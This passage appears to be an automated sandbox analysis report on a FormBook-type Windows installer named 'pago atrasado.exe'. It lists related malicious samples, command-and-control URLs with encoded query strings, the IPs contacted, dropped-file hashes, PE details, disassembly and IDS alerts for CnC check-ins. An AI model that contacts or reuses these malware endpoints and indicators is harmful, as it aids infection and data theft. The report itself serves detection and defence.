                                          • www.weprepareamerica-world.com/n092/?h0Gdj4dh=7QNXrpC+0zTYuDSJvYtcqWvwaJpzyS75Y6CJpFMcqskYdcMJUPnJbkzMB91F/535v440&1bkX=KN9l7
                                          INVPRF2100114_pdf.exeGet hashmaliciousBrowse
                                          • www.yourotcs.com/euzn/?vPAl-=CR-TLLc&5j=Jq5AABYnwO9dbv77N4nPQwsgHB5GKQbjMYkkdBpcGmLbEHlDRj4+NcKZLwDv+32oOSRS
                                          PkF9Fg2Tnc.exeGet hashmaliciousBrowse
                                          • www.thymoscorp.com/n092/?Cptd5=T476+wLEZakNnatpzDgnd+i8GD3CeHIKKZKbWkLuO1H4v0vGZa8Ua7CXK/8Rlqil4H1a&y4=7n3dvv
                                          2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                          • www.andrewfjohnston.com/b2c0/?1bV=j6ATrf&7nlpd=nPJDWeDX3x/7yoIb4Y8ACYvoKxwYoowpnQPys4jm4E2BXf8WUJ1hnsC1S/FzrgAx/9vb
                                          NEW ORDER INQUIRY_Q091421.PDF.exeGet hashmaliciousBrowse
                                          • www.barrier-to-entry.com/h5jc/?8pW=UAgdrLYBEBHnZD6vumMuWShxuTvQQAMT+4FDgagiYMIIlUmoqNFKWavZLlig6d0hZcfT&1bE8p=8p04q8mHnH
                                          ugsuHxq7Ey.exeGet hashmaliciousBrowse
                                          • www.weprepareamerica-world.com/n092/?UL=7QNXrpC+0zTYuDSJvYtcqWvwaJpzyS75Y6CJpFMcqskYdcMJUPnJbkzMB91vgJH5r6w0&rP=4hOh3
                                          DHL_Online_Receipt.docGet hashmaliciousBrowse
                                          • www.getrichadams.com/c3hy/?yfL8-tq0=+C97xekWOCtRqspsnKWJgGOuAPiwQzy0YYswFyxb/tYUxnF7+gywk2v6MOtw6eF1FCkoSQ==&f6A8=dxo0srcx
                                          m2F8C6rz9J.exeGet hashmaliciousBrowse
                                          • www.yesterdaystomorrownow.com/zizv/?FL0lxhs=tq18rE4QkgIvfNIpkqEMdP/7PcSlbVRZ9TDCQpLEuCwXiE5u+3jx/eVPwHHQIFKJLFE+&1bT8s=1bbhp0_P
                                          AWB.docGet hashmaliciousBrowse
                                          • www.shans-online.com/fzsg/?i2M8mbL8=wYA5+ODQw7YIFkSefVPDQdsb1XpS7kW79pgoTMk5mjoxU7vP2T6by19X6tBJuHEX3lcOtQ==&X6A=bTMtXz7XNfKd
                                          SOA.exeGet hashmaliciousBrowse
                                          • www.andrewfjohnston.com/b2c0/?3ff=y6AT2b&m4C=nPJDWeDSq27+w4JhkI8ACYvoKxwYoowpnQPys4jm4E2BXf8WUJ1hnsC1S8FsokkK/+Kf
                                          HBW PAYMENT LIST FOR 2021,20212009.xlsxGet hashmaliciousBrowse
                                          • www.hivizpeople.com/n092/?ixl0i0t=uaY0THpty5EvCloUtnm06lpodfUxh6yq2Ukbc245yKA9WepW8xtBavSpPmKwlutgZVJfqg==&kb=-Z4LWJsPDRiPHr
                                          77dsREO8Me.exeGet hashmaliciousBrowse
                                          • www.yourotcs.com/euzn/?6lDh4=Jq5AABYnwO9dbv77N4nPQwsgHB5GKQbjMYkkdBpcGmLbEHlDRj4+NcKZLwDFhHGoKQZS&Ph-PB=1bpljFA
                                          Sales _DEG212004755711421641.pdf.exeGet hashmaliciousBrowse
                                          • www.traveladvisorsuccess.net/gs2m/?8pHX=5jhxgd&h4=R9Myd3XtH8UfpLcxkW7UMZG2K+ZHkiBKmQ+KXW7xNpgHOl826W3TGb5gIiCaUB40A9/Y
                                          3xzHrbPdZ7.exeGet hashmaliciousBrowse
                                          • vpn.premrera.com:443/viewpre.asp?cstring=wcxbaa-1753643374&tom=255&id=6003031
                                          VINASHIP STAR.xlsxGet hashmaliciousBrowse
                                          • www.cpb.site/nthe/?xtxh=21tMkqEIUZBUKU+ck7CVVp3eTiqf/+4cN27Pgp5ejfxv1jbsXk06Rfkh8MQLsUSEnTHARw==&U2=mv-t_rDPAPsD6l
                                          MV TAICHUNG.xlsxGet hashmaliciousBrowse
                                          • www.cpb.site/nthe/?7nMt=21tMkqEIUZBUKU+ck7CVVp3eTiqf/+4cN27Pgp5ejfxv1jbsXk06Rfkh8MQLsUSEnTHARw==&gDHho=b2JPovgHUt
                                          BIN.exeGet hashmaliciousBrowse
                                          • www.jwpropertiestn.com/n8ba/?I6El7rEX=iMNnVuY+gvXz0j53tPU+imZoGlggyOcz8e4ohSepbhwGfYAQxyq22Rg/4FGnobgDSPq5&yBZ02=2df8xb-H6hatkZkp
                                          OrdGreece89244.exeGet hashmaliciousBrowse
                                          • www.carstoriesusa.net/rvoe/?q6pHq=L4-hsduP_n0dm&5jn=fAOs8VWxDgCcN/b38ZjPEpzSltT9i6eUIfWB05FDSs6jml76oEIdxB/bsn2NMp244tD1hAXsWQ==

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          shops.myshopify.comxHSUX1VjKN.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          dtMT5xGa54.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          New Order For Chile.xlsxGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          TransportLabel_1189160070.xlsxGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          REQ2021102862448032073.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          XaTgTJhfol.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          vk5MXd2Rxm.msiGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          pKD3j672HL.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          2KW3KamMqq.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          HP8voO5Ikv.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          DHLAWB 191021.xlsxGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          KYTransactionServer.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          103 Ref 2853801324189923.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          doc_0862413890.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          1cG7fOkPjS.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          549TXoJm6p.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          famz10.docGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          5Zebq6UNKC.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          8205108.exeGet hashmaliciousBrowse
                                          • 23.227.38.74
                                          MV ROCKET_PDA.exeGet hashmaliciousBrowse
                                          • 23.227.38.74

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          AMAZON-02US6AYs2EgVeN.apkGet hashmaliciousBrowse
                                          • 52.222.174.50
                                          4f0PBbcOBIGet hashmaliciousBrowse
                                          • 34.249.145.219
                                          REQUIREMENT.exeGet hashmaliciousBrowse
                                          • 3.121.211.190
                                          RlypFfB7n8Get hashmaliciousBrowse
                                          • 54.171.230.55
                                          7iw4z5I41wGet hashmaliciousBrowse
                                          • 34.249.145.219
                                          SecuriteInfo.com.Trojan.Linux.Generic.191302.28689.5288Get hashmaliciousBrowse
                                          • 54.171.230.55
                                          ldJp8ogMLq.apkGet hashmaliciousBrowse
                                          • 35.162.9.128
                                          ldJp8ogMLq.apkGet hashmaliciousBrowse
                                          • 44.235.227.57
                                          SecuriteInfo.com.Linux.BtcMine.470.15094.2496Get hashmaliciousBrowse
                                          • 108.157.2.216
                                          lpa-park.apkGet hashmaliciousBrowse
                                          • 54.229.52.247
                                          acciona-mobility-1-21-1.apkGet hashmaliciousBrowse
                                          • 143.204.225.4
                                          D0sF4Fm8ZaGet hashmaliciousBrowse
                                          • 52.53.23.88
                                          7rA3B9X5j6Get hashmaliciousBrowse
                                          • 18.188.26.105
                                          ut5yFyWEDdGet hashmaliciousBrowse
                                          • 18.182.10.188
                                          BW3i62l7HwGet hashmaliciousBrowse
                                          • 18.146.49.126
                                          dtMT5xGa54.exeGet hashmaliciousBrowse
                                          • 3.64.163.50
                                          SecuriteInfo.com.PUA.Tool.Linux.BtcMine.2805.26628.5655Get hashmaliciousBrowse
                                          • 34.249.145.219
                                          INV#409.xlsxGet hashmaliciousBrowse
                                          • 75.2.115.196
                                          sysethGet hashmaliciousBrowse
                                          • 54.171.230.55
                                          Preliminary Closing Statement and Fully Executed PSA for #U20ac 520k Released.htmlGet hashmaliciousBrowse
                                          • 13.32.99.121
                                          CONFLUENCE-NETWORK-INCVGiAuPyHuUkk.exeGet hashmaliciousBrowse
                                          • 208.91.197.27
                                          DHL-Waybill.exeGet hashmaliciousBrowse
                                          • 209.99.64.43
                                          orde443123.exeGet hashmaliciousBrowse
                                          • 208.91.197.91
                                          wDzceoRPhB.exeGet hashmaliciousBrowse
                                          • 208.91.197.27
                                          vbc.exeGet hashmaliciousBrowse
                                          • 208.91.197.91
                                          TransportLabel_1189160070.xlsxGet hashmaliciousBrowse
                                          • 209.99.64.33
                                          etiyrfIKft.exeGet hashmaliciousBrowse
                                          • 208.91.197.27
                                          MV ROCKET_PDA.exeGet hashmaliciousBrowse
                                          • 208.91.197.91
                                          DeqrIfxzHW.exeGet hashmaliciousBrowse
                                          • 208.91.197.91
                                          IMG100897 TWI-SHA 202102 BANK SHEETS.exeGet hashmaliciousBrowse
                                          • 208.91.197.91
                                          INVPRF2100114_pdf.exeGet hashmaliciousBrowse
                                          • 208.91.197.27
                                          DC0CA5C0D9189B6D050B125A4317045BA7A4BC4524E3E.exeGet hashmaliciousBrowse
                                          • 204.11.56.48
                                          PkF9Fg2Tnc.exeGet hashmaliciousBrowse
                                          • 208.91.197.27
                                          2WK7SGkGVZ.exeGet hashmaliciousBrowse
                                          • 208.91.197.27
                                          VC-Q-1056410-21GR1.exeGet hashmaliciousBrowse
                                          • 208.91.197.91
                                          Proforma Invoice #18083-INV-Order.PDF.exeGet hashmaliciousBrowse
                                          • 209.99.64.55
                                          NEW ORDER INQUIRY_Q091421.PDF.exeGet hashmaliciousBrowse
                                          • 208.91.197.27
                                          ugsuHxq7Ey.exeGet hashmaliciousBrowse
                                          • 208.91.197.27
                                          DHL_Online_Receipt.docGet hashmaliciousBrowse
                                          • 208.91.197.27
                                          doc#0210903000.exeGet hashmaliciousBrowse
                                          • 209.99.64.70

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll
                                          Process:C:\Users\user\Desktop\pago atrasado.exe
                                          File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):6.395766788929115
                                          Encrypted:false
                                          SSDEEP:1536:oJUmgGAYhReTNsu0yGLmQEQoOoLz8I5EgZ2UlH08mAiI3Wklk9ncobUfsQzt2jwM:CUmgGASei2EAPP3xlkrEmP
                                          MD5:4EB0E08649F542FD0E44BEF7845956FC
                                          SHA1:5FAC196EE8AF08F8F954F3086C0250A905986C02
                                          SHA-256:15ED84B6D171B6B6834AA6A39150B6165B2C83411929A8C6963B6E446DF44ED1
                                          SHA-512:DE809B359CCD7B65B41FD8320A16793C74AE1EECFEE3F25D8A9943CA4D2CDA675733794EC944E11D62FCD0F6AD9A0BFD7748E74841C68C6796255235B3D0B68F
                                          Malicious:false
                                          Reputation:low
                                          Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....fa...........!....."...z.......*..............................................................................<...M...........................................................................h]..H............................................text...) .......".................. ..`.rdata...S...@...T...&..............@..@.data...5B.......$...z..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          C:\Users\user\AppData\Local\Temp\upukqvxhfh
                                          Process:C:\Users\user\Desktop\pago atrasado.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):215137
                                          Entropy (8bit):7.991819771185154
                                          Encrypted:true
                                          SSDEEP:6144:eLTysZ+qYT8Em3yAwsDPmM2cPwQd/crz4wEvdt4:symYT8ayeQdUr8wEE
                                          MD5:34564360F76F9665C311E080E6C1CECC
                                          SHA1:87119F439AC4DF6D9FB59DA568218EBFCAF88981
                                          SHA-256:1AB4C2718912B5BF3137E94135F07CA6665B788448429D15C4AE04E6DF3FF8B1
                                          SHA-512:3410542C5ED5F5EC44521001E29201B535486B9FD843186827EDA99C2F739B78DDEE99070E74AACB770F61BA48EE18629BBB73D691E0DB567DE0702017D6EB77
                                          Malicious:false
                                          Reputation:low
                                          Preview: ."hRD!.-{.b9\...7oE...\=....|... ...D.."...1..@.i.........lk....4I.<..R.R...3s.....z.,.u.....>..G>K[.....)......`{^^.e<{#..m..4.+....6-@..nF. zZ.%lG3.t...H.d\\...9..eG.....*. Xb.LK........*....o.zS/.\9..F....0}m..y..|yg.}...nq.I...`q..............O!.-{.tRv..1OM...s...}.E... ..D..."......@.i.........lk_..=4S....uw.wt0...8.C......t...T.2.......q,+.B...rq.{^^.e<{.`UU..#K.{*...4s..4..K...s........AM.zsz.8:tkH.[......*.C..b..,....,.9.*......43.9.9w.....0}m.....|yy.}.H.nq.I...`q...^......P..O!.-{@.RvK.1OM..hs.5.}.E.... ...D.."...1..@.i.........lk_..=4S....uw.wt0...8.C......t...T.2.......q,+.B...rq.{^^.e<{.`UU..#K.{*...4s..4..K...s........AM.zsz.8:tkH.[.....*..Xb..,..D.,...*......43.9.9.......0}m.....|yy.}.H.nq.I...`q...^......P..O!.-{@.RvK.1OM..hs.5.}.E.... ...D.."...1..@.i.........lk_..=4S....uw.wt0...8.C......t...T.2.......q,+.B...rq.{^^.e<{.`UU..#K.{*...4s..4..K...s........AM.zsz.8:tkH.[.....*..Xb..,..D.,...*......43.9.9.......0}m.....|yy.}

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.9390817972262315
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:pago atrasado.exe
                                          File size:288183
                                          MD5:f841c72b1c4cadc4c98903ad26a96a16
                                          SHA1:06359aaf42a5ce60889ab7a93d8af7702b34630a
                                          SHA256:eaa038a0020fee7ddfe2919203f20f15ca1d7eb19d90b168cade93b5cf8d7f43
                                          SHA512:b80671d608aab3309567326b552a969245e448cd272e635a74abde9082d455e11f9d264928c61647d4b52b183c85425d3933fcffa4093b4453463e295f768f37
                                          SSDEEP:6144:wBlL/cQMpuMEI8xf6S6s4SOTJoR6qMdayJ5rSFb1e7uuUI0vVLM:CeQMzEDxf6I8J3dTXuuUbI
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint:0x4030fb
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:b76363e9cb88bf9390860da8e50999d2

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 00000184h
                                          push ebx
                                          push ebp
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+20h], ebx
                                          mov dword ptr [esp+14h], 00409168h
                                          mov dword ptr [esp+1Ch], ebx
                                          mov byte ptr [esp+18h], 00000020h
                                          call dword ptr [004070B0h]
                                          call dword ptr [004070ACh]
                                          cmp ax, 00000006h
                                          je 00007F34348B3B53h
                                          push ebx
                                          call 00007F34348B6934h
                                          cmp eax, ebx
                                          je 00007F34348B3B49h
                                          push 00000C00h
                                          call eax
                                          mov esi, 00407280h
                                          push esi
                                          call 00007F34348B68B0h
                                          push esi
                                          call dword ptr [00407108h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], bl
                                          jne 00007F34348B3B2Dh
                                          push 0000000Dh
                                          call 00007F34348B6908h
                                          push 0000000Bh
                                          call 00007F34348B6901h
                                          mov dword ptr [00423F44h], eax
                                          call dword ptr [00407038h]
                                          push ebx
                                          call dword ptr [0040726Ch]
                                          mov dword ptr [00423FF8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 0041F4F0h
                                          call dword ptr [0040715Ch]
                                          push 0040915Ch
                                          push 00423740h
                                          call 00007F34348B6534h
                                          call dword ptr [0040710Ch]
                                          mov ebp, 0042A000h
                                          push eax
                                          push ebp
                                          call 00007F34348B6522h
                                          push ebx
                                          call dword ptr [00407144h]

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9e0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x2d0000x9e00xa00False0.45625data4.50948350161IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x2d1900x2e8dataEnglishUnited States
                                          RT_DIALOG0x2d4780x100dataEnglishUnited States
                                          RT_DIALOG0x2d5780x11cdataEnglishUnited States
                                          RT_DIALOG0x2d6980x60dataEnglishUnited States
                                          RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                                          RT_MANIFEST0x2d7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                          Imports

                                          DLLImport
                                          KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                          USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                          ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          10/13/21-16:44:25.292716TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979080192.168.2.534.102.136.180
                                          10/13/21-16:44:25.292716TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979080192.168.2.534.102.136.180
                                          10/13/21-16:44:25.292716TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979080192.168.2.534.102.136.180
                                          10/13/21-16:44:25.406375TCP1201ATTACK-RESPONSES 403 Forbidden804979034.102.136.180192.168.2.5
                                          10/13/21-16:44:46.515561TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979380192.168.2.574.208.236.134
                                          10/13/21-16:44:46.515561TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979380192.168.2.574.208.236.134
                                          10/13/21-16:44:46.515561TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979380192.168.2.574.208.236.134
                                          10/13/21-16:45:02.310893TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979780192.168.2.53.64.163.50
                                          10/13/21-16:45:02.310893TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979780192.168.2.53.64.163.50
                                          10/13/21-16:45:02.310893TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979780192.168.2.53.64.163.50
                                          10/13/21-16:45:07.452062TCP1201ATTACK-RESPONSES 403 Forbidden804979823.227.38.74192.168.2.5

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 13, 2021 16:44:14.514519930 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:14.661742926 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.661844015 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:14.661981106 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:14.810870886 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906196117 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906234980 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906253099 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906270027 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906289101 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906325102 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906372070 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:14.906387091 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:14.906414986 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:14.956698895 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.011696100 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.053379059 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.053442001 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.053488970 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.053539991 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.053559065 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.053606987 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.097364902 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.103019953 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.103055954 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.103141069 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.160053015 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.199894905 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.199920893 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.199973106 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.200011015 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:15.306546926 CEST8049787208.91.197.27192.168.2.5
                                          Oct 13, 2021 16:44:15.307334900 CEST4978780192.168.2.5208.91.197.27
                                          Oct 13, 2021 16:44:25.274435043 CEST4979080192.168.2.534.102.136.180
                                          Oct 13, 2021 16:44:25.292285919 CEST804979034.102.136.180192.168.2.5
                                          Oct 13, 2021 16:44:25.292598009 CEST4979080192.168.2.534.102.136.180
                                          Oct 13, 2021 16:44:25.292716026 CEST4979080192.168.2.534.102.136.180
                                          Oct 13, 2021 16:44:25.310540915 CEST804979034.102.136.180192.168.2.5
                                          Oct 13, 2021 16:44:25.406374931 CEST804979034.102.136.180192.168.2.5
                                          Oct 13, 2021 16:44:25.406408072 CEST804979034.102.136.180192.168.2.5
                                          Oct 13, 2021 16:44:25.406739950 CEST4979080192.168.2.534.102.136.180
                                          Oct 13, 2021 16:44:25.406987906 CEST4979080192.168.2.534.102.136.180
                                          Oct 13, 2021 16:44:25.424902916 CEST804979034.102.136.180192.168.2.5
                                          Oct 13, 2021 16:44:41.083808899 CEST4979180192.168.2.546.101.121.244
                                          Oct 13, 2021 16:44:41.114418030 CEST804979146.101.121.244192.168.2.5
                                          Oct 13, 2021 16:44:41.114691019 CEST4979180192.168.2.546.101.121.244
                                          Oct 13, 2021 16:44:41.115659952 CEST4979180192.168.2.546.101.121.244
                                          Oct 13, 2021 16:44:41.150091887 CEST804979146.101.121.244192.168.2.5
                                          Oct 13, 2021 16:44:41.303195953 CEST804979146.101.121.244192.168.2.5
                                          Oct 13, 2021 16:44:41.303220034 CEST804979146.101.121.244192.168.2.5
                                          Oct 13, 2021 16:44:41.303375959 CEST4979180192.168.2.546.101.121.244
                                          Oct 13, 2021 16:44:41.303476095 CEST4979180192.168.2.546.101.121.244
                                          Oct 13, 2021 16:44:41.326456070 CEST804979146.101.121.244192.168.2.5
                                          Oct 13, 2021 16:44:46.371398926 CEST4979380192.168.2.574.208.236.134
                                          Oct 13, 2021 16:44:46.515207052 CEST804979374.208.236.134192.168.2.5
                                          Oct 13, 2021 16:44:46.515362024 CEST4979380192.168.2.574.208.236.134
                                          Oct 13, 2021 16:44:46.515561104 CEST4979380192.168.2.574.208.236.134
                                          Oct 13, 2021 16:44:46.662605047 CEST804979374.208.236.134192.168.2.5
                                          Oct 13, 2021 16:44:46.664726973 CEST804979374.208.236.134192.168.2.5
